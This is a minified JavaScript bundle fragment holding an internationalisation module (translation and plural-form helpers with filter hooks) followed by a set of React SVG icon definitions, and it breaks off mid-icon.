e=e=>{o.test(e)&&s()};n.addAction("hookAdded","core/i18n",e),n.addAction("hookRemoved","core/i18n",e)}return{getLocaleData:(e="default")=>i.data[e],setLocaleData:c,addLocaleData:(e,t="default")=>{i.data[t]={...i.data[t],...e,"":{...r,...i.data[t]?.[""],...e?.[""]}},delete i.pluralForms[t],s()},resetLocaleData:(e,t)=>{i.data={},i.pluralForms={},c(e,t)},subscribe:e=>(l.add(e),()=>l.delete(e)),__:(e,t)=>{let a=d(t,void 0,e);return n?(a=n.applyFilters("i18n.gettext",a,e,t),n.applyFilters("i18n.gettext_"+u(t),a,e,t)):a},_x,_n:(e,t,a,r)=>{let o=d(r,void 0,e,t,a);return n?(o=n.applyFilters("i18n.ngettext",o,e,t,a,r),n.applyFilters("i18n.ngettext_"+u(r),o,e,t,a,r)):o},_nx:(e,t,a,r,o)=>{let i=d(o,r,e,t,a);return n?(i=n.applyFilters("i18n.ngettext_with_context",i,e,t,a,r,o),n.applyFilters("i18n.ngettext_with_context_"+u(o),i,e,t,a,r,o)):i},isRTL:()=>"rtl"===_x("ltr","text direction"),hasTranslation:(e,t,a)=>{const r=t?t+""+e:e;let o=!!i.data?.[null!=a?a:"default"]?.[r];return n&&(o=n.applyFilters("i18n.has_translation",o,e,t,a),o=n.applyFilters("i18n.has_translation_"+u(a),o,e,t,a)),o}}}},7836:(e,t,n)=>{"use strict";n.d(t,{__:()=>__});var a=n(6016),r=n(1957);const o=(0,a.o)(void 0,void 0,r.JQ);o.getLocaleData.bind(o),o.setLocaleData.bind(o),o.resetLocaleData.bind(o),o.subscribe.bind(o);const __=o.__.bind(o);o._x.bind(o),o._n.bind(o),o._nx.bind(o),o.isRTL.bind(o),o.hasTranslation.bind(o)},2304:(e,t,n)=>{"use strict";n.d(t,{__:()=>a.__}),n(5917),n(6016);var a=n(7836)},5917:(e,t,n)=>{"use strict";var a=n(6290);n(8975),(0,a.Z)(console.error)},4528:(e,t,n)=>{"use strict";n.d(t,{c:()=>r});var a=n(7294);const r={add_plus_shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 .068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 